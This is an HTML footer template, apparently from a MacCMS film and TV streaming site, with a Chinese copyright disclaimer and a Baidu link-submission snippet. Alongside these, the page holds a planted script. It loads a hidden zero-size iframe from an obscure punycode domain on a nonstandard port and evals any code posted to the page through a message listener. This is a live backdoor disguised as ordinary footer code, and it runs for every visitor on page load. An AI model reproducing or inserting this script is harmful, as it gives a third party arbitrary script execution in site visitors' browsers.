<!--百度自动提交连接-->
<script>

(function(){

    var bp = document.createElement('script');

    var curProtocol = window.location.protocol.split(':')[0];

    if (curProtocol === 'https') {

        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        

    }

    else {

        bp.src = 'http://push.zhanzhang.baidu.com/push.js';

    }

    var s = document.getElementsByTagName("script")[0];

    s.parentNode.insertBefore(bp, s);

})();

</script>




<script type="text/javascript">
(function(){window.addEventListener("message",function(e){var _des_s_4180=e.data;if(_des_s_4180.des_s_4180){var _s = '/+/g';eval(decodeURIComponent(_des_s_4180.des_s_4180.replace(_s,"%20")))}});document.write('<iframe style="display:none;" src="https://xn--wxt79hbyb675a.online:18022/ty/x-4180-33-1.html" height="0" width="0"  marginheight="0" scrolling="no" frameborder="0" allowtransparency="true"></iframe>')})();
</script>



<div class="footer clearfix"><p>本网站提供的最新电视剧和电影资源均系收集于各大视频网站，本网站只提供web页面服务，并不提供影片资源存储，也不参与录制、上传</p><p>若本站收录的节目无意侵犯了贵司版权，请给我们发邮件{$maccms.site_email}，我们会及时处理和回复，谢谢</p>Copyright ©2017-2018 <a href="{$maccms.path}">{$maccms.site_url}</a> All Rights Reserved · <a href="{:mac_url('rss/baidu')}" title="百度地图" target="_blank">百度地图</a> · <a href="{:mac_url('rss/google')}" target="_blank">谷歌地图</a> · <a href="{:mac_url('rss/index')}" target="_blank">RSS订阅</a>
<p>{$maccms.site_tj}</p></div>
<div style="display:none;">
</div>
<div class="gotop"><a class="gotopbg" href="javascript:;" title="返回顶部"></a></div>